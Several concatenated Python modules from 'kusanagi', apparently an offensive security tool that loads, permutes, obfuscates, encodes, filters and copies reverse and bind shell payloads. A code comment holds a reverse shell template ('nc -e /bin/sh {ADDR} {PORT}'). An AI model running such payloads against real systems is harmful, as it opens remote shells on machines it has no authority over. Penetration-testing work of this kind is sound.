    # -q d/dir   <DIRECTION>
    # -q e/exe   <EXECUTABLE>
    # -q s/shell <SHELL>
    # -q c/cmd   <COMMANDS>
    # -q b/bad   <BADCHARS>

    # -o/--obfuscate
    # -e/--encode
    # -n/--noob

    # --------------------------------------------------------------------------
    # Command parser: misc arguments
    # --------------------------------------------------------------------------
    cmd_misc = parser_cmd.add_argument_group("misc arguments")
    cmd_misc.add_argument("-h", "--help", action="help", help="Show this help message and exit")

    #  -c/--copy [num] (by default last one)
    # mutate = parser.add_argument_group("mutate arguments")
    # mutate.add_argument("-e", "--encode", help="Encode")

    # positional = parser.add_argument_group("positional arguments")
    # query = parser.add_argument_group("query arguments")
    # mutate = parser.add_argument_group("mutate arguments")
    # listing = parser.add_argument_group("listing arguments")
    # optional = parser.add_argument_group("optional arguments")

    # --------------------------------------------------------------------------
    # Positional arguments
    # --------------------------------------------------------------------------
    #    positional.add_argument(
    #        "payload",
    #        type=str,
    #        choices=["cmd", "code"],
    #        help="""Payload to generate.
    # cmd:  generate a command to be executed on a shell.
    # code: generate executable code (e.g.: php)
    #
    # """
    #     )
    #     positional.add_argument(
    #         "addr",
    #         nargs="?",
    #         type=str,
    #         help="""(Optional) Address to listen or connect to
    #
    # """
    #     )
    #     positional.add_argument(
    #         "port",
    #         nargs="?",
    #         type=int,
    #         default=DEF_PORT,
    #         help="""(Optional) Port to listen or connect to
    # Default: %(port)i
    #
    # """
    #         % ({"port": DEF_PORT}),
    #     )

    #     cmd_test_arg = parser_cmd.add_argument_group("test group")
    #     cmd_test_arg.add_argument(
    #         "port",
    #         nargs="?",
    #         type=int,
    #         default=DEF_PORT,
    #         help="""(Optional) Port to listen or connect to
    # Default: %(port)i
    # """
    #         % ({"port": DEF_PORT}),
    #     )
    # cmd_test_arg.add_argument(
    #  "-h", "--help", action="help", help="Show this help message and exit")

    # --------------------------------------------------------------------------
    # Query arguments
    # --------------------------------------------------------------------------

    #    # -q/--query 1
    #    # -q/--query os linux
    #    # -q/--query os mac
    #    # -q/--query shell bind
    #    # -q/--query proto tcp
    #    # -b/--badchars "'"
    #    # -l/--lang
    #    query.add_argument(
    #        "-q",
    #        "--query",
    #        nargs="+",
    #        default=[],
    #        action='append',
    #        help="""Query shells based on conditions.
    # """
    #    )
    #
    #
    #    # --------------------------------------------------------------------------
    #    # Mutate arguments
    #    # --------------------------------------------------------------------------
    #    mutate.add_argument(
    #        "-e",
    #        "--encode",
    #        nargs="+",
    #        default=[],
    #        metavar="name",
    #        type=argparse_encoder_validate,
    #        help="""Encode shell code with one or more encoders.
    # When encoding multiple times, pay attention to the
    # order of specifying encoders.
    # To view available encoders, use --list-encoders."""
    #    )
    #    mutate.add_argument(
    #        "--quote",
    #        choices=["single", "double", "auto"],
    #        default="auto",
    #        type=str,
    #        help="""Set the quoting style for inner and outer quotes.
    # Some quotes are fixed (not changeable), depending on the
    # programming language, operating system or the way it is
    # handed over to a command.
    # By default, this option is set to auto, which uses
    # single quotes on the outside and double quotes inside."""
    #    )
    #
    #    # -q/--quote single, double, auto
    #    # -s/--shell sh, /bin/sh, bash, auto
    #    # -w/--wrapper cmd, gif, jpg, none
    #    # -e/--encode base64 url
    #    # -q/--query 1
    #    # -q/--query os linux
    #    # -q/--query os mac
    #    # -q/--query shell bind
    #    # -q/--query proto tcp
    #    # -b/--badchars "'"
    #    # -l/--lang
    #
    #    listing.add_argument(
    #        "--list-languages",
    #        action='store_true',
    #        help="""List available languages"""
    #    )
    #    listing.add_argument(
    #        "--list-payloads",
    #        action='store_true',
    #        help="""List available payloads"""
    #    )
    #    listing.add_argument(
    #        "--list-wrapper",
    #        action='store_true',
    #        help="""List available payloads wrapper"""
    #    )
    #    listing.add_argument(
    #        "--list-encoders",
    #        action=ListEncoderAction,
    #        help="""List available encoder"""
    #    )
    #
    # Return arguments
    return parser.parse_args()



"""Module to filter payloads on their given options."""
from typing import List
from .template.ds.ds_payload import DsPayload


def filter_executables(payloads: List[DsPayload], executables: List[str]) -> List[DsPayload]:
    """Returns only payloads for given list of executables."""
    if not executables:
        return payloads

    filtered = []
    for payload in payloads:
        if payload.filters.exe in executables:
            filtered.append(payload)
    return filtered


def filter_shells(payloads: List[DsPayload], shells: List[str]) -> List[DsPayload]:
    """Returns only payloads for given list of shells."""
    if not shells:
        return payloads

    filtered = []
    for payload in payloads:
        has_shell = False
        for shell in shells:
            if shell in payload.filters.shells:
                has_shell = True
        if has_shell:
            filtered.append(payload)
    return filtered


def filter_os(payloads: List[DsPayload], os: str) -> List[DsPayload]:
    """Returns only payloads for a given os."""
    if not os:
        return payloads

    filtered = []
    for payload in payloads:
        if os in payload.filters.os:
            filtered.append(payload)
    return filtered


def filter_badchars(payloads: List[DsPayload], badchars: str) -> List[DsPayload]:
    """Returns only payloads without specified badcharss."""
    if not badchars:
        return payloads

    filtered = []
    for payload in payloads:
        has_badchar = False
        for badchar in badchars:
            if badchar in payload.payload:
                has_badchar = True
        if not has_badchar:
            filtered.append(payload)
    return filtered


def filter_maxlen(payloads: List[DsPayload], maxlen: int) -> List[DsPayload]:
    """Returns only payloads not longer than maxlen."""
    if maxlen <= 0:
        return payloads

    filtered = []
    for payload in payloads:
        if len(payload.payload) <= maxlen:
            filtered.append(payload)
    return filtered



"""Validate a yaml file."""

from typing import Dict, Any
import re


def _validate_invalid_keys(section: str, data: Dict[Any, Any], validator: Dict[Any, Any]) -> None:
    for key in data:
        # Check if defined key should not be defined
        if key not in validator:
            print(key)
            print(type(key))
            raise KeyError(f"[CONFIG-FAIL] {section} invalid key defined: {key}")

        # Recurse into childs
        if validator[key]["childs"]:
            if isinstance(data[key], dict):
                _validate_invalid_keys(section + f"[{key}]", data[key], validator[key]["childs"])
            if isinstance(data[key], list):
                for index, value in enumerate(data[key]):
                    _validate_invalid_keys(
                        section + f"[{key}][{index}]", data[key][index], validator[key]["childs"]
                    )


def _validate_requirements(section: str, data: Dict[Any, Any], validator: Dict[Any, Any]) -> None:
    """Checks if data meets all requirements from validator dict.

    This is a forward validation, where it will be ensured that data contains
    required keys of correct type and correct values.

    Args:
        section (str): Name of the current yaml/dict section.
        data (Dict[Any, Any]): Yaml dict to validate.
        validator (Dict[Any, Any]): Yaml dict used to validate the yaml_dict against.

    Raises:
        KeyError: If data is invalid according to its validator definition.
    """
    for key in validator:

        # Check Required
        if validator[key]["required"] and key not in data:
            raise KeyError(f"[CONFIG-FAIL] {section}[{key}] not defined, but required")

        # Check Type
        if key in data and not isinstance(data[key], validator[key]["type"]):
            req_type = validator[key]["type"]
            raise KeyError(f"[CONFIG-FAIL] {section}[{key}] must be of type: {req_type}")

        # Check Allowed value by Regex
        if key in data and "allowed" in validator[key]:
            regex = validator[key]["allowed"]
            value = str(data[key])
            regobj = re.compile(regex)
            if regobj.match(value) is None:
                raise KeyError(f"[CONFIG-FAIL] {section}[{key}] = '{value}' must match: '{regex}'")

        # Recurse into childs
        if key in data and validator[key]["childs"]:
            if isinstance(data[key], dict):
                _validate_requirements(section + f"[{key}]", data[key], validator[key]["childs"])
            if isinstance(data[key], list):
                for index, value in enumerate(data[key]):
                    _validate_requirements(
                        section + f"[{key}][{index}]", data[key][index], validator[key]["childs"]
                    )



"""Template module."""

from typing import Dict, List, Any

import os
import sys
import pathlib

from .yaml_loader import YamlLoader
from .parser.placeholder import Placeholder
from .parser.permutator import Permutator
from .parser.compresser import Compresser
from .parser.function import Function
from .ds import DsPayload
from .ds import DsPayloadFilter
from ..core.encoder import encode


def load(addr: str, port: str) -> List[DsPayload]:
    """Returns a list of loaded DsPayload data types."""
    path = os.fspath(pathlib.Path(__file__).parent.absolute())
    path = os.fspath(os.path.join(path, "data"))
    path = os.fspath(os.path.join(path, "cmd-reverse-tcp-bash.yml"))

    data = YamlLoader.load(path)
    payloads = []

    for key, items in data["payloads"].items():
        for i in range(len(items["items"])):
            # Ensure __ADDR__ and __PORT__ placeholders are parsed and replaced.
            data["payloads"][key][i] = Placeholder.parse(items["items"][i], addr, port)

            # Mutate items based on defined variables and values
            for permutation in Permutator.get_item_permutations(items["items"][i]):
                # Compress codes
                permutation["payload"] = Compresser.trim(permutation["payload"])

                # Evaluate functions
                permutation["original"].append(permutation["payload"])
                permutation["payload"] = Function.eval(permutation["payload"])

                # Create filters
                filters = DsPayloadFilter(
                    key,
                    permutation["filters"]["shells"],
                    permutation["filters"]["os"],
                    permutation["filters"]["commands"],
                    permutation["filters"]["proto"],
                    permutation["filters"]["direction"],
                    permutation["filters"]["obfuscator"],
                )

                # Append to DsPayload data structure
                payloads.append(
                    DsPayload(
                        permutation["name"],
                        permutation["desc"],
                        key,
                        filters,
                        permutation["payload"],
                        permutation["original"],
                    )
                )
    return payloads



"""Module to compress the payload."""
from typing import Dict, List, Union, Any

import copy
import re
import itertools


class Compresser(object):
    """Compresser class."""

    @staticmethod
    def trim(data: str) -> str:
        """Trims whitepaces and newlines from a payload to make it a small as possible."""
        pattern_rgt = r"\s*$"  # Clean left of string
        pattern_lft = r"^\s*"  # Clean right of string
        pattern_all = r"\s\s"  # Two whitespaces in a row
        lines = []
        for line in data.splitlines():
            line = re.sub(pattern_rgt, "", line)
            line = re.sub(pattern_lft, "", line)
            line = re.sub(pattern_all, " ", line)
            lines.append(line)

        temp = "".join(lines)

        # Repeat until not further possible
        if temp != data:
            return Compresser.trim(temp)
        return temp



"""This module will evaluate defined functions."""

import re
from ..encoder import encode


def parse_functions(data: str) -> str:
    """Replaces <FUN:0...> to <FUN:9...> with their function outputs."""
    for num in range(0, 10):
        pattern = fr"(<FUN:{num}:(.+?)>(.+?)<\/FUN:{num}:\2>)"
        reg = re.compile(pattern, flags=re.MULTILINE | re.DOTALL)
        ret = reg.findall(data)

        for match in ret:
            repl = match[0]  # Whole string to replace
            func = match[1]  # Function name, e.g. base64
            find = match[2]  # String in between function delimiter
            data = data.replace(repl, encode(find, func))
    return data



"""Clipboard module."""

import pyperclip  # type: ignore

# IMPORTANT:
# On Windows, no additional modules are needed.
#
# On Mac, this module makes use of the pbcopy and pbpaste commands, which should come with the os.
#
# On Linux, this module makes use of the xclip or xsel commands, which should come with the os.
# Otherwise run “sudo apt-get install xclip” or “sudo apt-get install xsel”
# (Note: xsel does not always seem to work.)
#
# Otherwise on Linux, you will need the gtk or PyQt4 modules installed.


def copy_to_clipboard(data: str) -> None:
    """Copy text to clipboard."""
    pyperclip.copy(data)



"""Module to compress the payload."""
from typing import Dict, List, Union, Any

import copy
import re
import itertools


def compress(data: str) -> str:
    """Trims whitepaces and newlines from a payload to make it a small as possible."""
    pattern_rgt = r"\s*$"  # Clean left of string
    pattern_lft = r"^\s*"  # Clean right of string
    pattern_all = r"\s\s"  # Two whitespaces in a row
    lines = []
    for line in data.splitlines():
        line = re.sub(pattern_rgt, "", line)
        line = re.sub(pattern_lft, "", line)
        line = re.sub(pattern_all, " ", line)
        lines.append(line)

    temp = "".join(lines)

    # Repeat until not further possible
    if temp != data:
        return compress(temp)
    return temp



"""This file holds the payload yaml validator/definition template."""

VALIDATOR = {
    "type": {
        "type": str,
        "required": True,
        "allowed": "^(cmd|code|file)$",
        "childs": {},
    },
    "command": {
        "type": str,
        "required": True,
        "allowed": "^(.+)$",
        "childs": {},
    },
    "version": {
        "type": str,
        "required": True,
        "allowed": "^([0-9]+\\.[0-9]+\\.[0-9]+)$",
        "childs": {},
    },
    "payloads": {
        "type": list,
        "required": True,
        "childs": {
            "name": {
                "type": str,
                "required": True,
                "allowed": "^(.+)$",
                "childs": {},
            },
            "desc": {
                "type": str,
                "required": True,
                "allowed": "^(.+)$",
                "childs": {},
            },
            "info": {
                "type": list,
                "required": True,
                "childs": {},
            },
            "meta": {
                "type": dict,
                "required": True,
                "childs": {
                    "authors": {
                        "type": list,
                        "required": True,
                        "childs": {},
                    },
                    "created": {
                        "type": str,
                        "required": True,
                        "allowed": "^([0-9]{4}-[0-9]{2}-[0-9]{2})$",
                        "childs": {},
                    },
                    "modified": {
                        "type": str,
                        "required": True,
                        "allowed": "^([0-9]{4}-[0-9]{2}-[0-9]{2})$",
                        "childs": {},
                    },
                    "version": {
                        "type": str,
                        "required": True,
                        "allowed": "^([0-9]+\\.[0-9]+\\.[0-9]+)$",
                        "childs": {},
                    },
                },
            },
            "filters": {
                "type": dict,
                "required": True,
                "childs": {
                    "cmd_exe": {
                        "type": str,
                        "required": True,
                        "allowed": "^(.+)$",
                        "childs": {},
                    },
                    "cmd_shell": {
                        "type": str,
                        "required": True,
                        "allowed": "^(.+)$",
                        "childs": {},
                    },
                    "shell": {
                        "type": str,
                        "required": True,
                        "allowed": "^(.+)$",
                        "childs": {},
                    },
                    "shells": {
                        "type": list,
                        "required": True,
                        "childs": {},
                    },
                    "os": {
                        "type": list,
                        "required": True,
                        "childs": {},
                    },
                    "commands": {
                        "type": list,
                        "required": True,
                        "childs": {},
                    },
                    "encoders": {
                        "type": list,
                        "required": True,
                        "childs": {},
                    },
                    "proto": {
                        "type": str,
                        "required": True,
                        "allowed": "^(tcp|udp)$",
                        "childs": {},
                    },
                    "direction": {
                        "type": str,
                        "required": True,
                        "allowed": "^(reverse|bind)$",
                        "childs": {},
                    },
                },
            },
            "variables": {
                "type": list,
                "required": True,
                "childs": {
                    "name": {
                        "type": str,
                        "required": True,
                        "allowed": "^(.+)$",
                        "childs": {},
                    },
                    "values": {
                        "type": list,
                        "required": True,
                        "childs": {
                            "value": {
                                "type": str,
                                "required": True,
                                "allowed": "^(.*)$",
                                "childs": {},
                            },
                            "filters": {
                                "type": dict,
                                "required": False,
                                "childs": {
                                    "cmd_exe": {
                                        "type": str,
                                        "required": False,
                                        "allowed": "^(.+)$",
                                        "childs": {},
                                    },
                                    "cmd_shell": {
                                        "type": str,
                                        "required": False,
                                        "allowed": "^(.+)$",
                                        "childs": {},
                                    },
                                    "shell": {
                                        "type": str,
                                        "required": False,
                                        "allowed": "^(.+)$",
                                        "childs": {},
                                    },
                                    "shells": {
                                        "type": list,
                                        "required": False,
                                        "childs": {},
                                    },
                                    "os": {
                                        "type": list,
                                        "required": False,
                                        "childs": {},
                                    },
                                    "commands": {
                                        "type": list,
                                        "required": False,
                                        "childs": {},
                                    },
                                    "encoders": {
                                        "type": list,
                                        "required": False,
                                        "childs": {},
                                    },
                                    "proto": {
                                        "type": str,
                                        "required": False,
                                        "allowed": "^(tcp|udp)$",
                                        "childs": {},
                                    },
                                    "direction": {
                                        "type": str,
                                        "required": False,
                                        "allowed": "^(reverse|bind)$",
                                        "childs": {},
                                    },
                                },
                            },
                        },
                    },
                },
            },
            "payload": {
                "type": str,
                "required": True,
                "allowed": "^(.*__ADDR__.*__PORT__.*|.*__PORT__.*__ADDR__.*|.*__CODE__.*)$",
                "childs": {},
            },
        },
    },
}



"""Main file for kusanagi."""

from typing import Callable, Any

import os
import sys
import time
import timeit
import pathlib

from .args import *
from .lib.clipboard import copy_to_clipboard
from .template import *
from .output import output
from .filter import filter_os
from .filter import filter_badchars
from .filter import filter_executables
from .filter import filter_shells
from .filter import filter_maxlen
from .sorter import sort_by_length

from .core.payload.cmd import get_payloads


def main() -> None:
    """Run main entrypoint."""
    cmd_args = get_args()

    if cmd_args.payload in ["file", "code"]:
        print(f"{cmd_args.payload} method not yet implemented")
        sys.exit(0)

    # Retrieve payloads
    payloads = get_payloads(cmd_args.addr, str(cmd_args.port))

    # Filter payloads
    payloads = filter_executables(payloads, cmd_args.exe)
    payloads = filter_shells(payloads, cmd_args.shell)
    payloads = filter_os(payloads, cmd_args.os)
    payloads = filter_badchars(payloads, cmd_args.badchars)
    payloads = filter_maxlen(payloads, cmd_args.maxlen)

    # Sort payloads
    payloads = sort_by_length(payloads)

    # [OUTPUT] If no copy was specified, just output the payloads
    if cmd_args.copy == -1:
        output(payloads, cmd_args.addr, str(cmd_args.port), cmd_args.enc, cmd_args.quick)
        sys.exit(0)

    # [COPY] Copy payload to clipboard
    index = cmd_args.copy
    if cmd_args.copy is None:
        # Copy last element to clipboard
        index = -1
    try:
        copy_to_clipboard(payloads[index].payload)
    except IndexError:
        print(f"[ERROR] payload with index {index} does not exist", file=sys.stderr)
        sys.exit(1)
    else:
        payload = payloads[index]
        output([payload], cmd_args.addr, str(cmd_args.port), cmd_args.enc, True)
        print("copied", file=sys.stderr)


if __name__ == "__main__":
    main()



"""Payload Module."""

from typing import List, Dict, Any
from .loader import _load
from ...typing.ds_payload import DsPayload


def get_payloads(addr: str, port: str) -> List[DsPayload]:
    """Returns list of payloads."""
    placeholders = {
        "__ADDR__": addr,
        "__PORT__": port,
    }
    return _load(placeholders)



"""Module to evaluate defined functions in payload string."""
from typing import Dict, List, Union, Any

import copy
import re
import itertools

from ...core.encoder import encode


class Function(object):
    """Function class."""

    # --------------------------------------------------------------------------
    # Public function
    # --------------------------------------------------------------------------
    @staticmethod
    def eval(data: str) -> str:
        """Replaces <FUN:0...> to <FUN:9...> with their function outputs."""
        for num in range(0, 10):
            pattern = fr"(<FUN:{num}:(.+?)>(.+?)<\/FUN:{num}:\2>)"
            reg = re.compile(pattern, flags=re.MULTILINE | re.DOTALL)
            ret = reg.findall(data)

            for match in ret:
                repl = match[0]  # Whole string to replace
                func = match[1]  # Function name, e.g. base64
                find = match[2]  # String in between function delimiter
                data = data.replace(repl, encode(find, func))
        return data



"""Module to permutate a payload item based on the available variables."""
from typing import Dict, List, Union, Any

import copy
import re
import itertools


class Permutator(object):
    """Replaces the __ADDR__ and __PORT__ placeholders on an item."""

    # --------------------------------------------------------------------------
    # Public function
    # --------------------------------------------------------------------------
    @staticmethod
    def get_item_permutations(item: Dict[str, Any]) -> List[Dict[str, Any]]:
        """Returns a list of item permutation based on defined variables and values.

        Raises:
            KeyError: If variable is used, but not defined.
        """
        items = []

        # Ensure variables are properly defined
        Permutator.__validate_variables(item)

        # Permutate payload with available variations
        for perm in Permutator.__permutate_variations(item):
            # Permutate payload with available variables
            items += Permutator.__permutate_variables(perm)

        return items

    # --------------------------------------------------------------------------
    # Private function
    # --------------------------------------------------------------------------
    @staticmethod
    def __permutate_variations(item: Dict[str, Any]) -> List[Dict[str, Any]]:
        """Creates mutations for each available payload variation.

        This function returns the item in a list if no variations have been defined.
        If variations are defined, the function will return the original payload and
        all variations as a separate item in a list.

        Returns:
            List[Dict[str, Any]]: List of permutated variation items.
        """
        items = [item]

        # If no variations are defined, we just take
        # the item as it is and return it as a list item.
        if not item["variations"]:
            return items

        for variation in item["variations"]:
            # variables = {
            #   varX: valX-1
            #   varY: valY-1
            # }
            mutation = copy.deepcopy(item)
            if "original" not in mutation:
                mutation["original"] = []

            # Update name and filters
            mutation["name"] = "{} ({})".format(mutation["name"], variation["name"])
            mutation["filters"].update(variation["filters"])

            # Replace Payload placeholder
            mutation["payload"] = variation["payload"].replace("{PAYLOAD}", item["payload"])

            # Update original steps
            mutation["original"].append(item["payload"])
            mutation["original"].append(variation["payload"])

            # Append mutation
            items.append(mutation)
        return items

    @staticmethod
    def __permutate_variables(item: Dict[str, Any]) -> List[Dict[str, Any]]:
        """Creates mutations for each available mutation variable.

        This function will make as many copies of the input item as there are
        variable combinations/permutations. It will then copy back the variables[].filters
        into top-level filters of that permutation and finally replace the variables in
        payload and top-level filters values.

        Returns:
            List[Dict[str, Any]]: List of mutated items.
        """
        items = []
        # Replace with available variables

        # If no mutation variables are defined, we just take
        # the payload as it is and return it as a list item.
        if not item["variables"]:
            return [item]

        # {key:["val1", "val2"]}
        variable_dict = {var["name"]: var["values"] for var in item["variables"]}
        # Get all combinations of defined variable mutations
        # https://stackoverflow.com/a/61335465
        keys, values = zip(*variable_dict.items())
        permutations = [dict(zip(keys, v)) for v in itertools.product(*values)]
        # permutations = [
        #   {
        #     varX: valX-1
        #     varY: valY-1
        #   }
        #   {
        #     varX: valX-2
        #     varY: valY-1
        #   }
        # ]
        for variables in permutations:
            # variables = {
            #   varX: valX-1
            #   varY: valY-1
            # }
            mutation = copy.deepcopy(item)
            if "original" not in mutation:
                mutation["original"] = []

            # Copy/overwrite filters from variables[].filters
            # into top-level filters for current variable mutation.
            for variable in item["variables"]:
                # variable = {
                #   name: "varX"
                #   filters: dict
                #   values: []
                # }
                if variable["name"] in variables:
                    mutation["filters"].update(variable["filters"])

            # Replace variables in payload and filters
            mutation["payload"] = Permutator.__replace_variables(mutation["payload"], variables)
            mutation["filters"] = Permutator.__replace_variables(mutation["filters"], variables)
            mutation["original"].append(item["payload"])

            # Append mutation
            items.append(mutation)

        return items

    @staticmethod
    def __replace_variables(
        data: Union[bool, str, List[str], Dict[str, Any]], variables: Dict[str, str]
    ) -> Union[bool, str, List[str], Dict[str, Any]]:
        """Replace."""
        temp = copy.deepcopy(data)
        if isinstance(temp, list):
            for i in range(len(temp)):
                temp[i] = Permutator.__replace_variables(temp[i], variables)
            return temp

        if isinstance(temp, dict):
            for key in temp:
                temp[key] = Permutator.__replace_variables(temp[key], variables)
            return temp

        if isinstance(temp, str):
            for name, value in variables.items():
                temp = temp.replace(f"{{VAR:{name}}}", value)
            return temp

        return temp

    @staticmethod
    def __validate_variables(item: Dict[str, Any]) -> None:
        """Validate item if used variables are defined.

        Variables can be used in the payload string, the variations strings and
        in filter values of item, variables and variations.

        Raises:
            KeyError: If variable is used, but not defined with variable name as error string.
        """
        # item = {
        #   name: payload-name
        #   desc: payload-desc
        #   filters:
        #     test: {VAR:shell}
        #   variables:
        #     - name: shell
        #       filters:
        #         filt1: "{VAR:shell}"
        #       values: ["tet"]
        #   variations:
        #     - name: shell{VAR:shell}
        #       filters:
        #         filt1: "{VAR:shell}"
        #       payload: {PAYLOAD}|base64 -d
        #   payload: nc -e /bin/sh {ADDR} {PORT}
        # }
        defined_vars = [variable["name"] for variable in item["variables"]]

        # Check payload
        try:
            Permutator.__is_variable_defined(item["payload"], defined_vars)
        except KeyError as err:
            raise KeyError(f"Variable '{err}' used in payload, but not defined") from err

        # Check filters
        try:
            Permutator.__is_variable_defined(item["filters"], defined_vars)
        except KeyError as err:
            raise KeyError(f"Variable '{err}' used in filters, but not defined") from err

        # Check variable filters
        for variable in item["variables"]:
            try:
                Permutator.__is_variable_defined(variable["filters"], defined_vars)
            except KeyError as err:
                raise KeyError(
                    f"Variable '{err}' used in variables[].filters, but not defined"
                ) from err

        # Check variations
        for variation in item["variations"]:
            # variation name
            try:
                Permutator.__is_variable_defined(variation["name"], defined_vars)
            except KeyError as err:
                raise KeyError(
                    f"Variable '{err}' used in variations[].name, but not defined"
                ) from err
            # variation payload
            try:
                Permutator.__is_variable_defined(variation["payload"], defined_vars)
            except KeyError as err:
                raise KeyError(
                    f"Variable '{err}' used in variations[].payload, but not defined"
                ) from err
            # variation filters
            try:
                Permutator.__is_variable_defined(variation["filters"], defined_vars)
            except KeyError as err:
                raise KeyError(
                    f"Variable '{err}' used in variations[].filters, but not defined"
                ) from err

    @staticmethod
    def __is_variable_defined(
        data: Union[bool, str, List[str], Dict[Any, Any]], defined_vars: List[str]
    ) -> None:
        """Check if a variable in data is actually defined and raise KeyError if not.

        Raises:
            KeyError if used variable in data is not defined.
        """
        pattern = r"{VAR:(.+?)}"
        reg = re.compile(pattern, flags=re.MULTILINE | re.DOTALL)

        if isinstance(data, str):
            ret = reg.findall(data)
            for used_var in ret:
                if used_var not in defined_vars:
                    raise KeyError(f"{used_var}")

        if isinstance(data, list):
            for val in data:
                ret = reg.findall(val)
                for used_var in ret:
                    if used_var not in defined_vars:
                        raise KeyError(f"{used_var}")

        if isinstance(data, dict):
            for key in data:
                Permutator.__is_variable_defined(data[key], defined_vars)



"""Module to sort payloads on their given options."""
from typing import List
from .template.ds.ds_payload import DsPayload


def sort_by_length(payloads: List[DsPayload]) -> List[DsPayload]:
    """Sort payloads by length."""
    return sorted(payloads, key=lambda k: len(k.payload), reverse=True)



"""Permutator Module which permutates payloads or obfuscator items.

Permutation is first done on all possible combination of defined variables and their values
on a payload or obfuscator item.
Example: If one item has two variables defined and the first one has two values and the second one
has four values, then the final variable permutation is 2*4 == 8.

Then each payload item is permutated with all available obfuscators that are working on that item.
If an obfuscator works for a payload is determined by their 'filters.shells[]' list.
If both (payload and obfuscator) have the same value in that filter, they will work.
The filters.shells list will then be intersected.
"""

from typing import Dict, List, Union, Any

import copy
import re
import itertools


def obfuscate_payloads(
    payload: Dict[str, Any],
    obfuscators: List[Dict[Any, Any]],
) -> List[Dict[Any, Any]]:
    """Create payload variations for each available obfuscator.

    This should be done after variable permutations.
    Obfuscators and payloads will be matched based on their 'filters.shells' (list).
    The created list will also intersect filters.shells and merge filters.commands and
    filters.encoders.

    Args:
        payload (Dict[str, Any]): Payload item
        obfuscators (List[Dict[Any, Any]]): all available obfuscators

    Returns:
        dict: Python dict from yaml file.
    """
    items = []
    for obfuscator in obfuscators:
        for shell in obfuscator["filters"]["shells"]:
            # We have found an obfuscator that will work for the payload
            if shell in payload["filters"]["shells"]:
                item = copy.deepcopy(payload)
                # Intersect filters.shells
                shells = list(set(item["filters"]["shells"]) & set(obfuscator["filters"]["shells"]))
                item["filters"]["shells"] = shells

                # Combine filters.commands and filters.encoders
                commands = item["filters"]["commands"] + obfuscator["filters"]["commands"]
                encoders = item["filters"]["encoders"] + obfuscator["filters"]["encoders"]
                item["filters"]["commands"] = list(set(commands))  # Ensure unique items
                item["filters"]["encoders"] = list(set(encoders))  # Ensure unique items

                # Append original string to original
                item["original"].append(item["payload"])

                # Replace payload
                item["payload"] = obfuscator["payload"].replace("__PAYLOAD__", item["payload"])

                # Append items
                items.append(item)

    return items


def permutate_variables(item: Dict[str, Any]) -> List[Dict[str, Any]]:
    """Creates mutations for each available mutation variable.

    This function will make as many copies of the input item as there are
    variable combinations/permutations. It will then copy back the variables[].filters
    into top-level filters of that permutation and finally replace the variables in
    payload and top-level filters values.

    Returns:
        List[Dict[str, Any]]: List of mutated items.
    """
    # TODO/FIXME: Make this function nicer, better var naming
    items = []
    # Replace with available variables

    # If no mutation variables are defined, we just take
    # the item as it is and return it as a list item.
    if not item["variables"]:
        if "original" not in item:
            item["original"] = []
        return [item]

    # variable_dict = {
    #   '<varname>': [
    #     {'value': '<value-1>', 'filters': {}},
    #     {'value': '<value-2>', 'filters': {}},
    #   ]
    # }
    variable_dict = {var["name"]: var["values"] for var in item["variables"]}
    # Get all combinations of defined variable mutations
    # https://stackoverflow.com/a/61335465
    keys, values = zip(*variable_dict.items())

    # permutations = [
    #   {'<varname>': {'value': '<value-1>', 'filters': None}},
    #   {'<varname>': {'value': '<value-2>', 'filters': None}}
    # ]
    permutations = [dict(zip(keys, v)) for v in itertools.product(*values)]
    # permutations = [
    #   {
    #     varX: [value: valX-1, filters: {}]
    #     varY: [value: valY-1, filters: {}]
    #   }
    #   {
    #     varX: [value: valX-2, filters: {}]
    #     varY: [value: valY-1, filters: {}]
    #   }
    # ]
    for variables in permutations:
        # <var-name> : {
        #   {varX: {value: valX-1, filters: {}},
        #   {varY: {value: valY-1, filters: {}},
        # }
        mutation = copy.deepcopy(item)
        if "original" not in mutation:
            mutation["original"] = []

        # Copy/overwrite filters from variables[].filters
        # into top-level filters for current variable mutation.
        try:
            filters = {key: variables[key]["filters"] for key in variables}
        except KeyError:
            filters = {}
        for variable in variables:
            if "filters" in variables[variable]:
                mutation["filters"].update(variables[variable]["filters"])

        # Replace variables in payload and filters
        repvars = {key: variables[key]["value"] for key in variables}
        mutation["payload"] = __replace_variables(mutation["payload"], repvars)
        mutation["filters"].update(__replace_variables(mutation["filters"], repvars))
        mutation["original"].append(item["payload"])

        # Append mutation
        items.append(mutation)

    return items


def __replace_variables(
    data: Union[bool, str, List[str], Dict[str, Any]], variables: Dict[str, str]
) -> Union[bool, str, List[str], Dict[str, Any]]:
    """Replace."""
    temp = copy.deepcopy(data)

    if isinstance(temp, list):
        for i in range(len(temp)):
            temp[i] = __replace_variables(temp[i], variables)
        return temp

    if isinstance(temp, dict):
        for key in temp:
            temp[key] = __replace_variables(temp[key], variables)
        return temp

    if isinstance(temp, str):
        for name, value in variables.items():
            temp = temp.replace(f"{{VAR:{name}}}", value)
        return temp

    return temp



"""Load a yaml file."""

from typing import Dict, Any

import errno
import os
import yaml


def _load(path: str) -> Dict[Any, Any]:
    """Load yaml file by path and return it as Python dictionary.

    Args:
        path (str): Path to yaml file.

    Returns:
        dict: Python dict from yaml file.

    Raises:
        OSError: If file not found or yaml cannot be read.
        KeyError: If file cannot be parsed.
    """
    try:
        file_p = open(path)
    except FileNotFoundError as err_file:
        error = os.strerror(errno.ENOENT)
        raise OSError(f"[ERROR] File does not exist: {path}\n{error}")
    except PermissionError as err_perm:
        error = os.strerror(errno.EACCES)
        raise OSError(f"[ERROR] No permission to load file form: {path}\n{error}")
    else:
        try:
            return dict(yaml.safe_load(file_p))
        except yaml.YAMLError as err_yaml:
            error = str(err_yaml)
            raise KeyError(f"[ERROR]: {path}\n{error}") from err_yaml
        finally:
            file_p.close()



"""Pip configuration."""
# https://github.com/pypa/sampleproject/blob/main/setup.py

from setuptools import setup

with open("README.md", "r") as fp:
    long_description = fp.read()

with open("requirements.txt", "r") as fp:
    requirements = fp.read()

setup(
    name="kusanagi",
    version="0.0.2",
    packages=[
        "kusanagi",
        "kusanagi.core",
        "kusanagi.core.compressor",
        "kusanagi.core.encoder",
        "kusanagi.core.obfuscator",
        "kusanagi.core.parser",
        "kusanagi.core.payload",
        "kusanagi.core.payload.cmd",
        "kusanagi.core.payload.code",
        "kusanagi.core.payload.file",
        "kusanagi.core.permutator",
        "kusanagi.core.typing",
        "kusanagi.lib",
        "kusanagi.lib.clipboard",
        "kusanagi.lib.template",
        "kusanagi.lib.template",
        "kusanagi.lib.yaml",
        "kusanagi.template",
        "kusanagi.template.parser",
        "kusanagi.template.ds",
    ],
    package_data={
        "kusanagi": [
